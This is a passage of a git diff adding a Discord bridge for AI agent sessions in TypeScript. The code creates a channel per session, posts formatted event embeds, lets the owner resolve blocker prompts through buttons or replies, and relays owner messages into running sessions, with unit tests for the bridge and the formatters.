+        react: mock.fn(async () => {}),
+        reply: mock.fn(async () => {}),
+      };
+      client.emit('messageCreate', msg);
+      await tick();
+
+      assert.equal(mockFn(msg.reply).mock.callCount(), 1);
+    });
+  });
+
+  describe('session:completed → cleanup', () => {
+    it('posts completion embed and cleans up', async () => {
+      const { bridge, sessionManager, logger } = buildBridge();
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      sessionManager.emit('session:completed', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      // After cleanup, events for this session are silently ignored
+      sessionManager.emit('session:event', {
+        sessionId: 'sess-1', projectDir: '/test/project',
+        event: { type: 'tool_execution_start', name: 'read' } as SdkAgentEvent,
+      });
+      await tick();
+      assert.equal(mockFn(logger.error).mock.callCount(), 0);
+    });
+  });
+
+  describe('session:error → cleanup', () => {
+    it('posts error embed and cleans up', async () => {
+      const { bridge, sessionManager, logger } = buildBridge();
+      bridge.start();
+
+      sessionManager.emit('session:started', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project',
+      });
+      await tick();
+
+      sessionManager.emit('session:error', {
+        sessionId: 'sess-1', projectDir: '/test/project', projectName: 'my-project', error: 'Process crashed',
+      });
+      await tick();
+
+      const infoCalls = mockFn(logger.info).mock.calls;
+      assert.ok(
+        infoCalls.some((c) => String(c.arguments[0]).includes('session error')),
+      );
+    });
+  });
+});
diff --git a/packages/daemon/src/event-bridge.ts b/packages/daemon/src/event-bridge.ts
new file mode 100644
index 000000000..8df4dfd4e
--- /dev/null
+++ b/packages/daemon/src/event-bridge.ts
@@ -0,0 +1,494 @@
+/**
+ * event-bridge.ts — Orchestrator wiring SessionManager events through
+ * formatter → batcher → Discord channels.
+ *
+ * Handles:
+ *   - Session lifecycle → Discord channel creation and cleanup
+ *   - Event streaming → format + verbosity filter + batcher
+ *   - Blocker resolution → interactive buttons + text relay
+ *   - Conversation relay → Discord messages forwarded to GSD sessions
+ *   - DM backup → owner gets DM on blocker when dm_on_blocker configured
+ */
+
+import type { Client, Message, TextChannel, MessageComponentInteraction } from 'discord.js';
+import { EmbedBuilder, ComponentType } from 'discord.js';
+import type { SdkAgentEvent } from '@gsd-build/rpc-client';
+import type { Logger } from './logger.js';
+import type { DaemonConfig, PendingBlocker } from './types.js';
+import type { SessionManager } from './session-manager.js';
+import type { ChannelManager } from './channel-manager.js';
+import { MessageBatcher } from './message-batcher.js';
+import { VerbosityManager } from './verbosity.js';
+import {
+  formatEvent,
+  formatBlocker,
+  formatSessionStarted,
+  formatError,
+  formatCompletion,
+} from './event-formatter.js';
+import { isAuthorized } from './discord-bot.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+/** Minimal interface for a Discord client — extracted for testability. */
+export interface BridgeClient {
+  on(event: 'messageCreate', listener: (message: Message) => void): void;
+  off(event: 'messageCreate', listener: (message: Message) => void): void;
+  users: { fetch(id: string): Promise<{ send(opts: unknown): Promise<unknown> }> };
+}
+
+/** Options for creating an EventBridge. */
+export interface EventBridgeOptions {
+  sessionManager: SessionManager;
+  channelManager: ChannelManager;
+  client: BridgeClient;
+  config: DaemonConfig;
+  logger: Logger;
+  ownerId: string;
+}
+
+// ---------------------------------------------------------------------------
+// Collector timeout
+// ---------------------------------------------------------------------------
+
+const BLOCKER_COLLECTOR_TIMEOUT_MS = 24 * 60 * 60 * 1000; // 24 hours
+
+// ---------------------------------------------------------------------------
+// EventBridge
+// ---------------------------------------------------------------------------
+
+export class EventBridge {
+  private readonly sessionManager: SessionManager;
+  private readonly channelManager: ChannelManager;
+  private readonly client: BridgeClient;
+  private readonly config: DaemonConfig;
+  private readonly logger: Logger;
+  private readonly ownerId: string;
+
+  /** sessionId → channelId */
+  private readonly sessionToChannel = new Map<string, string>();
+  /** channelId → sessionId */
+  private readonly channelToSession = new Map<string, string>();
+  /** sessionId → MessageBatcher */
+  private readonly batchers = new Map<string, MessageBatcher>();
+  /** sessionId → TextChannel (cached for send operations) */
+  private readonly channels = new Map<string, TextChannel>();
+
+  private readonly verbosity = new VerbosityManager();
+
+  /** Bound event handlers for cleanup */
+  private boundHandlers: {
+    started: (...args: unknown[]) => void;
+    event: (...args: unknown[]) => void;
+    blocked: (...args: unknown[]) => void;
+    completed: (...args: unknown[]) => void;
+    error: (...args: unknown[]) => void;
+    messageCreate: (msg: Message) => void;
+  } | null = null;
+
+  constructor(opts: EventBridgeOptions) {
+    this.sessionManager = opts.sessionManager;
+    this.channelManager = opts.channelManager;
+    this.client = opts.client;
+    this.config = opts.config;
+    this.logger = opts.logger;
+    this.ownerId = opts.ownerId;
+  }
+
+  // -----------------------------------------------------------------------
+  // Lifecycle
+  // -----------------------------------------------------------------------
+
+  /** Subscribe to SessionManager events and Discord messageCreate. */
+  start(): void {
+    if (this.boundHandlers) return; // already started
+
+    this.boundHandlers = {
+      started: (data: unknown) => {
+        void this.onSessionStarted(data as SessionStartedPayload);
+      },
+      event: (data: unknown) => {
+        void this.onSessionEvent(data as SessionEventPayload);
+      },
+      blocked: (data: unknown) => {
+        void this.onSessionBlocked(data as SessionBlockedPayload);
+      },
+      completed: (data: unknown) => {
+        void this.onSessionCompleted(data as SessionCompletedPayload);
+      },
+      error: (data: unknown) => {
+        void this.onSessionError(data as SessionErrorPayload);
+      },
+      messageCreate: (msg: Message) => {
+        void this.handleMessageCreate(msg);
+      },
+    };
+
+    this.sessionManager.on('session:started', this.boundHandlers.started);
+    this.sessionManager.on('session:event', this.boundHandlers.event);
+    this.sessionManager.on('session:blocked', this.boundHandlers.blocked);
+    this.sessionManager.on('session:completed', this.boundHandlers.completed);
+    this.sessionManager.on('session:error', this.boundHandlers.error);
+    this.client.on('messageCreate', this.boundHandlers.messageCreate);
+
+    this.logger.info('event bridge started');
+  }
+
+  /** Unsubscribe from all events, destroy batchers, clear mappings. */
+  async stop(): Promise<void> {
+    if (this.boundHandlers) {
+      this.sessionManager.off('session:started', this.boundHandlers.started);
+      this.sessionManager.off('session:event', this.boundHandlers.event);
+      this.sessionManager.off('session:blocked', this.boundHandlers.blocked);
+      this.sessionManager.off('session:completed', this.boundHandlers.completed);
+      this.sessionManager.off('session:error', this.boundHandlers.error);
+      this.client.off('messageCreate', this.boundHandlers.messageCreate);
+      this.boundHandlers = null;
+    }
+
+    // Destroy all batchers
+    const destroyPromises: Promise<void>[] = [];
+    for (const batcher of this.batchers.values()) {
+      destroyPromises.push(batcher.destroy());
+    }
+    await Promise.allSettled(destroyPromises);
+
+    this.batchers.clear();
+    this.sessionToChannel.clear();
+    this.channelToSession.clear();
+    this.channels.clear();
+
+    this.logger.info('event bridge stopped');
+  }
+
+  /** Expose the verbosity manager for slash-command integration. */
+  getVerbosityManager(): VerbosityManager {
+    return this.verbosity;
+  }
+
+  // -----------------------------------------------------------------------
+  // SessionManager event handlers
+  // -----------------------------------------------------------------------
+
+  private async onSessionStarted(data: SessionStartedPayload): Promise<void> {
+    const { sessionId, projectDir, projectName } = data;
+
+    try {
+      const channel = await this.channelManager.createProjectChannel(projectDir);
+
+      // Create batcher with channel.send as the send function
+      const batcher = new MessageBatcher(
+        async (payload) => {
+          await channel.send(payload as Parameters<TextChannel['send']>[0]);
+        },
+        this.logger,
+      );
+      batcher.start();
+
+      // Register bidirectional mapping
+      this.sessionToChannel.set(sessionId, channel.id);
+      this.channelToSession.set(channel.id, sessionId);
+      this.batchers.set(sessionId, batcher);
+      this.channels.set(sessionId, channel);
+
+      // Post welcome embed
+      const welcome = formatSessionStarted(projectName);
+      batcher.enqueue(welcome);
+
+      this.logger.info('bridge: session channel created', {
+        sessionId,
+        channelId: channel.id,
+        projectName,
+      });
+    } catch (err) {
+      // Failure mode: log error, skip streaming for this session
+      this.logger.error('bridge: channel creation failed', {
+        sessionId,
+        projectDir,
+        error: err instanceof Error ? err.message : String(err),
+      });
+    }
+  }
+
+  private async onSessionEvent(data: SessionEventPayload): Promise<void> {
+    const { sessionId, event } = data;
+    const channelId = this.sessionToChannel.get(sessionId);
+    if (!channelId) return; // no channel for this session
+
+    // Verbosity filter
+    const eventType = (event as Record<string, unknown>).type as string;
+    if (!this.verbosity.shouldShow(channelId, eventType)) return;
+
+    const formatted = formatEvent(event, this.ownerId);
+    const batcher = this.batchers.get(sessionId);
+    if (batcher) {
+      batcher.enqueue(formatted);
+    }
+  }
+
+  private async onSessionBlocked(data: SessionBlockedPayload): Promise<void> {
+    const { sessionId, projectName, blocker } = data;
+    const channel = this.channels.get(sessionId);
+    if (!channel) return;
+
+    const formatted = formatBlocker(blocker, this.ownerId);
+
+    // Send immediately (bypasses batching for blockers)
+    const batcher = this.batchers.get(sessionId);
+    if (batcher) {
+      await batcher.enqueueImmediate(formatted);
+    }
+
+    // For select/confirm methods, set up button collector
+    if (blocker.method === 'select' || blocker.method === 'confirm') {
+      this.createButtonCollector(sessionId, channel, blocker);
+    }
+
+    // DM backup
+    if (this.config.discord?.dm_on_blocker) {
+      await this.sendBlockerDM(sessionId, projectName, blocker);
+    }
+  }
+
+  private async onSessionCompleted(data: SessionCompletedPayload): Promise<void> {
+    const { sessionId, projectName } = data;
+    const batcher = this.batchers.get(sessionId);
+    if (!batcher) return;
+
+    const completion = formatCompletion({
+      type: 'execution_complete',
+      status: 'completed',
+    } as SdkAgentEvent);
+
+    // Flush through batcher then cleanup
+    batcher.enqueue(completion);
+    await this.cleanupSession(sessionId);
+
+    this.logger.info('bridge: session completed', { sessionId, projectName });
+  }
+
+  private async onSessionError(data: SessionErrorPayload): Promise<void> {
+    const { sessionId, projectName, error } = data;
+    const batcher = this.batchers.get(sessionId);
+    if (!batcher) return;
+
+    const errorEmbed = formatError(sessionId, error);
+    batcher.enqueue(errorEmbed);
+    await this.cleanupSession(sessionId);
+
+    this.logger.info('bridge: session error', { sessionId, projectName, error });
+  }
+
+  // -----------------------------------------------------------------------
+  // Blocker resolution — button collector
+  // -----------------------------------------------------------------------
+
+  private createButtonCollector(
+    sessionId: string,
+    channel: TextChannel,
+    blocker: PendingBlocker,
+  ): void {
+    // Create a message collector on the channel for button interactions
+    // We use createMessageComponentCollector on the channel
+    try {
+      const collector = channel.createMessageComponentCollector({
+        componentType: ComponentType.Button,
+        time: BLOCKER_COLLECTOR_TIMEOUT_MS,
+        filter: (interaction: MessageComponentInteraction) => {
+          return interaction.customId.startsWith(`blocker:${blocker.id}:`);
+        },
+      });
+
+      collector.on('collect', async (interaction: MessageComponentInteraction) => {
+        // Auth guard
+        if (!isAuthorized(interaction.user.id, this.ownerId)) {
+          await interaction.reply({
+            content: '⛔ Only the project owner can respond to blockers.',
+            ephemeral: true,
+          }).catch(() => {});
+          return;
+        }
+
+        // Parse customId: blocker:{id}:{method}:{value}
+        const parts = interaction.customId.split(':');
+        const value = parts[3] ?? '';
+
+        try {
+          await this.sessionManager.resolveBlocker(sessionId, value);
+          await interaction.update({
+            content: `✅ Blocker resolved with: ${value}`,
+            components: [],
+          }).catch(() => {});
+          collector.stop('resolved');
+        } catch (err) {
+          const errMsg = err instanceof Error ? err.message : String(err);
+          this.logger.error('bridge: blocker resolve failed', { sessionId, error: errMsg });
+          await interaction.reply({
+            content: `❌ Failed to resolve blocker: ${errMsg}`,
+            ephemeral: true,
+          }).catch(() => {});
+        }
+      });
+
+      collector.on('end', (_collected, reason) => {
+        if (reason === 'time') {
+          // Timeout: edit to show expired
+          this.logger.info('bridge: blocker collector timed out', { sessionId, blockerId: blocker.id });
+          // Post a new message indicating expiry — editing original may fail
+          const batcher = this.batchers.get(sessionId);
+          if (batcher) {
+            batcher.enqueue({
+              content: `⏰ Blocker response timed out after 24h. Re-posting...`,
+              embed: new EmbedBuilder()
+                .setColor(0xf1c40f)
+                .setTitle('⏰ Blocker Expired')
+                .setDescription(blocker.message)
+                .setTimestamp(),
+            });
+          }
+        }
+      });
+    } catch (err) {
+      this.logger.error('bridge: collector creation failed', {
+        sessionId,
+        error: err instanceof Error ? err.message : String(err),
+      });
+    }
+  }
+
+  // -----------------------------------------------------------------------
+  // DM backup
+  // -----------------------------------------------------------------------
+
+  private async sendBlockerDM(
+    sessionId: string,
+    projectName: string,
+    blocker: PendingBlocker,
+  ): Promise<void> {
+    try {
+      const user = await this.client.users.fetch(this.ownerId);
+      await user.send({
+        content: `⚠️ **Blocker** in **${projectName}** — ${blocker.message}\n\nRespond in the project channel.`,
+      });
+      this.logger.debug('bridge: DM sent for blocker', { sessionId, blockerId: blocker.id });
+    } catch (err) {
+      // DM failure is non-fatal — channel message is the primary path
+      this.logger.warn('bridge: DM send failed', {
+        sessionId,
+        error: err instanceof Error ? err.message : String(err),
+      });
+    }
+  }
+
+  // -----------------------------------------------------------------------
+  // Conversation relay — Discord → GSD
+  // -----------------------------------------------------------------------
+
+  private async handleMessageCreate(message: Message): Promise<void> {
+    // Filter: bot messages
+    if (message.author.bot) return;
+
+    // Filter: must be in a project channel
+    const sessionId = this.channelToSession.get(message.channelId);
+    if (!sessionId) return;
+
+    // Filter: must be authorized
+    if (!isAuthorized(message.author.id, this.ownerId)) return;
+
+    const session = this.sessionManager.getSession(sessionId);
+    if (!session) return;
+
+    // If session has a pending blocker with input/editor method, resolve it
+    if (session.pendingBlocker && (session.pendingBlocker.method === 'input' || session.pendingBlocker.method === 'editor')) {
+      try {
+        await this.sessionManager.resolveBlocker(sessionId, message.content);
+        await message.react('✅').catch(() => {});
+        this.logger.info('bridge: blocker resolved via relay', {
+          sessionId,
+          method: session.pendingBlocker.method,
+        });
+      } catch (err) {
+        const errMsg = err instanceof Error ? err.message : String(err);
+        this.logger.error('bridge: relay blocker resolve failed', { sessionId, error: errMsg });
+        await message.reply(`❌ Failed to resolve blocker: ${errMsg}`).catch(() => {});
+      }
+      return;
+    }
+
+    // Otherwise, relay the message to the GSD session
+    // Use steer() when running (injects mid-turn), prompt() otherwise (starts new turn)
+    try {
+      if (session.status === 'running') {
+        await session.client.steer(message.content);
+      } else {
+        await session.client.prompt(message.content);
+      }
+      await message.react('📨').catch(() => {});
+      this.logger.info('bridge: message relayed to session', {
+        sessionId,
+        method: session.status === 'running' ? 'steer' : 'prompt',
+      });
+    } catch (err) {
+      const errMsg = err instanceof Error ? err.message : String(err);
+      this.logger.error('bridge: relay failed', { sessionId, error: errMsg });
+      await message.reply(`❌ Failed to relay message: ${errMsg}`).catch(() => {});
+    }
+  }
+
+  // -----------------------------------------------------------------------
+  // Cleanup
+  // -----------------------------------------------------------------------
+
+  private async cleanupSession(sessionId: string): Promise<void> {
+    const batcher = this.batchers.get(sessionId);
+    if (batcher) {
+      await batcher.destroy();
+      this.batchers.delete(sessionId);
+    }
+
+    const channelId = this.sessionToChannel.get(sessionId);
+    if (channelId) {
+      this.channelToSession.delete(channelId);
+    }
+    this.sessionToChannel.delete(sessionId);
+    this.channels.delete(sessionId);
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Internal event payload types (matching SessionManager emissions)
+// ---------------------------------------------------------------------------
+
+interface SessionStartedPayload {
+  sessionId: string;
+  projectDir: string;
+  projectName: string;
+}
+
+interface SessionEventPayload {
+  sessionId: string;
+  projectDir: string;
+  event: SdkAgentEvent;
+}
+
+interface SessionBlockedPayload {
+  sessionId: string;
+  projectDir: string;
+  projectName: string;
+  blocker: PendingBlocker;
+}
+
+interface SessionCompletedPayload {
+  sessionId: string;
+  projectDir: string;
+  projectName: string;
+}
+
+interface SessionErrorPayload {
+  sessionId: string;
+  projectDir: string;
+  projectName: string;
+  error: string;
+}
diff --git a/packages/daemon/src/event-formatter.test.ts b/packages/daemon/src/event-formatter.test.ts
new file mode 100644
index 000000000..dead1e385
--- /dev/null
+++ b/packages/daemon/src/event-formatter.test.ts
@@ -0,0 +1,402 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { EmbedBuilder, ActionRowBuilder, ButtonBuilder } from 'discord.js';
+import type { SdkAgentEvent } from '@gsd-build/rpc-client';
+import type { PendingBlocker, FormattedEvent } from './types.js';
+import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+import {
+  formatToolStart,
+  formatToolEnd,
+  formatMessage,
+  formatBlocker,
+  formatCompletion,
+  formatError,
+  formatCostUpdate,
+  formatSessionStarted,
+  formatTaskTransition,
+  formatGenericEvent,
+  formatEvent,
+} from './event-formatter.js';
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function embedColor(fe: FormattedEvent): number | null {
+  return fe.embed?.data.color ?? null;
+}
+
+function embedTitle(fe: FormattedEvent): string | undefined {
+  return fe.embed?.data.title;
+}
+
+function embedDescription(fe: FormattedEvent): string | undefined {
+  return fe.embed?.data.description;
+}
+
+// ---------------------------------------------------------------------------
+// formatToolStart
+// ---------------------------------------------------------------------------
+
+describe('formatToolStart', () => {
+  it('produces grey embed with tool name', () => {
+    const result = formatToolStart({ type: 'tool_execution_start', name: 'read_file' });
+    assert.ok(result.content.includes('read_file'));
+    assert.equal(embedColor(result), 0x95a5a6); // grey
+    assert.ok(embedTitle(result)?.includes('read_file'));
+  });
+
+  it('handles missing name gracefully', () => {
+    const result = formatToolStart({ type: 'tool_execution_start' });
+    assert.ok(result.content.includes('unknown'));
+  });
+
+  it('includes input in description when present', () => {
+    const result = formatToolStart({ type: 'tool_execution_start', name: 'bash', input: 'ls -la' });
+    assert.ok(embedDescription(result)?.includes('ls -la'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatToolEnd
+// ---------------------------------------------------------------------------
+
+describe('formatToolEnd', () => {
+  it('shows success icon for normal completion', () => {
+    const result = formatToolEnd({ type: 'tool_execution_end', name: 'read_file', output: 'done' });
+    assert.ok(result.content.includes('✅'));
+    assert.equal(embedColor(result), 0x95a5a6); // grey
+  });
+
+  it('shows error icon and red color for errored tool', () => {
+    const result = formatToolEnd({ type: 'tool_execution_end', name: 'bash', isError: true });
+    assert.ok(result.content.includes('❌'));
+    assert.equal(embedColor(result), 0xe74c3c); // red
+  });
+
+  it('includes duration when present', () => {
+    const result = formatToolEnd({ type: 'tool_execution_end', name: 'bash', duration: 3500 });
+    assert.ok(result.embed?.data.footer?.text?.includes('3.5s'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatMessage
+// ---------------------------------------------------------------------------
+
+describe('formatMessage', () => {
+  it('extracts text from content blocks', () => {
+    const result = formatMessage({
+      type: 'message',
+      content: [{ type: 'text', text: 'Hello world' }],
+    });
+    assert.ok(embedDescription(result)?.includes('Hello world'));
+    assert.equal(embedColor(result), 0x3498db); // blue
+  });
+
+  it('falls back to message field when content is a string', () => {
+    const result = formatMessage({ type: 'message', message: 'plain text' });
+    assert.ok(embedDescription(result)?.includes('plain text'));
+  });
+
+  it('handles empty content blocks', () => {
+    const result = formatMessage({ type: 'message', content: [] });
+    assert.ok(result.content.includes('empty message'));
+    assert.equal(result.embed, undefined);
+  });
+
+  it('handles null content gracefully', () => {
+    const result = formatMessage({ type: 'message' });
+    assert.ok(result.content.includes('empty message'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatBlocker — select
+// ---------------------------------------------------------------------------
+
+describe('formatBlocker', () => {
+  it('produces ActionRow with numbered buttons for select', () => {
+    const blocker: PendingBlocker = {
+      id: 'req-1',
+      method: 'select',
+      message: 'Choose an option',
+      event: {
+        type: 'extension_ui_request',
+        id: 'req-1',
+        method: 'select',
+        title: 'Choose',
+        options: ['Option A', 'Option B', 'Option C'],
+      },
+    };
+
+    const result = formatBlocker(blocker, '12345');
+    assert.ok(result.content.includes('<@12345>'));
+    assert.equal(embedColor(result), 0xf1c40f); // yellow
+    assert.ok(result.components);
+    assert.ok(result.components!.length > 0);
+
+    // Check buttons
+    const row = result.components![0];
+    const buttons = row.components;
+    assert.equal(buttons.length, 3);
+  });
+
+  it('handles empty options array for select', () => {
+    const blocker: PendingBlocker = {
+      id: 'req-2',
+      method: 'select',
+      message: 'Pick one',
+      event: {
+        type: 'extension_ui_request',
+        id: 'req-2',
+        method: 'select',
+        title: 'Pick',
+        options: [],
+      },
+    };
+
+    const result = formatBlocker(blocker, '12345');
+    // No components when no options
+    assert.equal(result.components, undefined);
+    // Embed should show 'No options'
+    const fields = result.embed?.data.fields;
+    assert.ok(fields?.some((f) => f.value.includes('No options')));
+  });
+
+  it('produces Yes/No buttons for confirm', () => {
+    const blocker: PendingBlocker = {
+      id: 'req-3',
+      method: 'confirm',
+      message: 'Are you sure?',
+      event: {
+        type: 'extension_ui_request',
+        id: 'req-3',
+        method: 'confirm',
+        title: 'Confirm',
+        message: 'This will delete everything',
+      },
+    };
+
+    const result = formatBlocker(blocker, '99999');
+    assert.ok(result.components);
+    assert.equal(result.components!.length, 1);
+    const buttons = result.components![0].components;
+    assert.equal(buttons.length, 2);
+  });
+
+  it('produces text instructions for input method', () => {
+    const blocker: PendingBlocker = {
+      id: 'req-4',
+      method: 'input',
+      message: 'Enter your name',
+      event: {
+        type: 'extension_ui_request',
+        id: 'req-4',
+        method: 'input',
+        title: 'Name',
+        placeholder: 'John Doe',
+      },
+    };
+
+    const result = formatBlocker(blocker, '12345');
+    // No interactive buttons for input — text instructions only
+    assert.equal(result.components, undefined);
+    const fields = result.embed?.data.fields;
+    assert.ok(fields?.some((f) => f.value.includes('Reply in this channel')));
+  });
+
+  it('produces text instructions for editor method', () => {
+    const blocker: PendingBlocker = {
+      id: 'req-5',
+      method: 'editor',
+      message: 'Edit the config',
+      event: {
+        type: 'extension_ui_request',
+        id: 'req-5',
+        method: 'editor',
+        title: 'Config',
+        prefill: 'key: value',
+      },
+    };
+
+    const result = formatBlocker(blocker, '12345');
+    assert.equal(result.components, undefined);
+    const fields = result.embed?.data.fields;
+    assert.ok(fields?.some((f) => f.value.includes('Reply in this channel')));
+    assert.ok(fields?.some((f) => f.value.includes('key: value')));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatCompletion
+// ---------------------------------------------------------------------------
+
+describe('formatCompletion', () => {
+  it('shows green for completed', () => {
+    const result = formatCompletion({ type: 'execution_complete', status: 'completed' });
+    assert.equal(embedColor(result), 0x2ecc71); // green
+    assert.ok(result.content.includes('🏁'));
+  });
+
+  it('shows red for error status', () => {
+    const result = formatCompletion({
+      type: 'execution_complete',
+      status: 'error',
+      reason: 'Out of tokens',
+    });
+    assert.equal(embedColor(result), 0xe74c3c); // red
+    assert.ok(embedDescription(result)?.includes('Out of tokens'));
+  });
+
+  it('includes stats when present', () => {
+    const result = formatCompletion({
+      type: 'execution_complete',
+      status: 'completed',
+      stats: { cost: 0.42, tokens: { total: 10000 } },
+    });
+    const fields = result.embed?.data.fields;
+    assert.ok(fields?.some((f) => f.value.includes('$0.42')));
+    assert.ok(fields?.some((f) => f.value.includes('10,000')));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatError
+// ---------------------------------------------------------------------------
+
+describe('formatError', () => {
+  it('includes session ID and error message', () => {
+    const result = formatError('sess-abc', 'Connection refused');
+    assert.equal(embedColor(result), 0xe74c3c); // red
+    assert.ok(embedDescription(result)?.includes('Connection refused'));
+    assert.ok(result.embed?.data.footer?.text?.includes('sess-abc'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatCostUpdate
+// ---------------------------------------------------------------------------
+
+describe('formatCostUpdate', () => {
+  it('formats cumulative cost', () => {
+    const result = formatCostUpdate({
+      type: 'cost_update',
+      cumulativeCost: 1.23,
+      tokens: { input: 5000, output: 2000 },
+    });
+    assert.ok(result.content.includes('$1.23'));
+    assert.equal(embedColor(result), 0x3498db); // blue
+  });
+
+  it('handles zero cost', () => {
+    const result = formatCostUpdate({
+      type: 'cost_update',
+      cumulativeCost: 0,
+      tokens: { input: 0, output: 0 },
+    });
+    assert.ok(result.content.includes('$0.0000'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatSessionStarted
+// ---------------------------------------------------------------------------
+
+describe('formatSessionStarted', () => {
+  it('includes project name', () => {
+    const result = formatSessionStarted('my-project');
+    assert.ok(result.content.includes('my-project'));
+    assert.ok(embedDescription(result)?.includes('my-project'));
+    assert.equal(embedColor(result), 0x3498db); // blue
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatTaskTransition
+// ---------------------------------------------------------------------------
+
+describe('formatTaskTransition', () => {
+  it('shows complete icon for completed tasks', () => {
+    const result = formatTaskTransition({
+      type: 'task_transition',
+      taskId: 'T01',
+      sliceId: 'S01',
+      status: 'complete',
+    });
+    assert.ok(result.content.includes('✅'));
+    assert.equal(embedColor(result), 0x2ecc71); // green
+  });
+
+  it('shows error icon for errored tasks', () => {
+    const result = formatTaskTransition({
+      type: 'task_transition',
+      taskId: 'T02',
+      status: 'error',
+    });
+    assert.ok(result.content.includes('❌'));
+    assert.equal(embedColor(result), 0xe74c3c); // red
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatGenericEvent
+// ---------------------------------------------------------------------------
+
+describe('formatGenericEvent', () => {
+  it('renders unknown event type as grey embed', () => {
+    const result = formatGenericEvent({ type: 'some_custom_event', data: 'hello' });
+    assert.equal(embedColor(result), 0x95a5a6); // grey
+    assert.ok(embedTitle(result)?.includes('some_custom_event'));
+  });
+
+  it('handles events with no extra fields', () => {
+    const result = formatGenericEvent({ type: 'bare_event' });
+    assert.ok(result.content.includes('bare_event'));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// formatEvent — dispatch
+// ---------------------------------------------------------------------------
+
+describe('formatEvent', () => {
+  it('dispatches tool_execution_start', () => {
+    const result = formatEvent({ type: 'tool_execution_start', name: 'read' });
+    assert.ok(result.content.includes('🔧'));
+  });
+
+  it('dispatches execution_complete', () => {
+    const result = formatEvent({ type: 'execution_complete', status: 'completed' });
+    assert.ok(result.content.includes('🏁'));
+  });
+
+  it('falls back to generic for unknown types', () => {
+    const result = formatEvent({ type: 'totally_unknown' });
+    assert.ok(result.content.includes('📡'));
+  });
+
+  it('dispatches cost_update', () => {
+    const result = formatEvent({ type: 'cost_update', cumulativeCost: 0.5 });
+    assert.ok(result.content.includes('💰'));
+  });
+
+  it('dispatches message types', () => {
+    for (const type of ['message_start', 'message_end', 'message']) {
+      const result = formatEvent({ type, message: 'hi' });
+      assert.ok(result.content.includes('💬'), `Failed for type: ${type}`);
+    }
+  });
+
+  // Negative: missing type field
+  it('handles event with missing type gracefully', () => {
+    const result = formatEvent({} as SdkAgentEvent);
+    assert.ok(result.content); // should not throw
+  });
+
+  // Negative: null fields
+  it('handles event with null fields gracefully', () => {
+    const result = formatEvent({ type: 'tool_execution_start', name: null } as unknown as SdkAgentEvent);
+    assert.ok(result.content);
+  });
+});
diff --git a/packages/daemon/src/event-formatter.ts b/packages/daemon/src/event-formatter.ts
new file mode 100644
index 000000000..2828c1db1
--- /dev/null
+++ b/packages/daemon/src/event-formatter.ts
@@ -0,0 +1,414 @@
+/**
+ * event-formatter.ts — Pure functions mapping RPC event types to Discord embeds.
+ *
+ * Each formatter returns a FormattedEvent (content string + optional EmbedBuilder +
+ * optional ActionRow components). Distinct embed colors per category:
+ *   green  = success / completion
+ *   red    = error
+ *   yellow = blocker (needs attention)
+ *   blue   = info / session lifecycle
+ *   grey   = tool / generic
+ */
+
+import { EmbedBuilder, ActionRowBuilder, ButtonBuilder, ButtonStyle } from 'discord.js';
+import type { SdkAgentEvent } from '@gsd-build/rpc-client';
+import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+import type { FormattedEvent, PendingBlocker } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Color palette
+// ---------------------------------------------------------------------------
+
+const COLOR = {
+  success: 0x2ecc71, // green
+  error: 0xe74c3c,   // red
+  blocker: 0xf1c40f,  // yellow
+  info: 0x3498db,     // blue
+  tool: 0x95a5a6,     // grey
+} as const;
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+/** Truncate a string to maxLen, appending ellipsis if truncated. */
+function truncate(s: string, maxLen: number): string {
+  if (s.length <= maxLen) return s;
+  return s.slice(0, maxLen - 1) + '…';
+}
+
+/** Safe string extraction from an unknown field. */
+function str(value: unknown, fallback = ''): string {
+  if (typeof value === 'string') return value;
+  if (value == null) return fallback;
+  return String(value);
+}
+
+/** Safe number extraction. */
+function num(value: unknown, fallback = 0): number {
+  if (typeof value === 'number' && !Number.isNaN(value)) return value;
+  return fallback;
+}
+
+/** Format a cost value to a readable string. */
+function formatCost(cost: number): string {
+  if (cost < 0.01) return `$${cost.toFixed(4)}`;
+  return `$${cost.toFixed(2)}`;
+}
+
+// ---------------------------------------------------------------------------
+// Formatters
+// ---------------------------------------------------------------------------
+
+export function formatToolStart(event: SdkAgentEvent): FormattedEvent {
+  const toolName = str(event.name || event.toolName, 'unknown');
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.tool)
+    .setTitle(`🔧 ${truncate(toolName, 60)}`)
+    .setTimestamp();
+
+  const input = str(event.input || event.args);
+  if (input) {
+    embed.setDescription(`\`\`\`\n${truncate(input, 300)}\n\`\`\``);
+  }
+
+  return { content: `🔧 Tool: ${toolName}`, embed };
+}
+
+export function formatToolEnd(event: SdkAgentEvent): FormattedEvent {
+  const toolName = str(event.name || event.toolName, 'unknown');
+  const isError = event.isError === true || event.error != null;
+  const color = isError ? COLOR.error : COLOR.tool;
+  const icon = isError ? '❌' : '✅';
+
+  const embed = new EmbedBuilder()
+    .setColor(color)
+    .setTitle(`${icon} ${truncate(toolName, 60)}`)
+    .setTimestamp();
+
+  const output = str(event.output || event.result);
+  if (output) {
+    embed.setDescription(`\`\`\`\n${truncate(output, 300)}\n\`\`\``);
+  }
+
+  const duration = num(event.duration || event.durationMs);
+  if (duration > 0) {
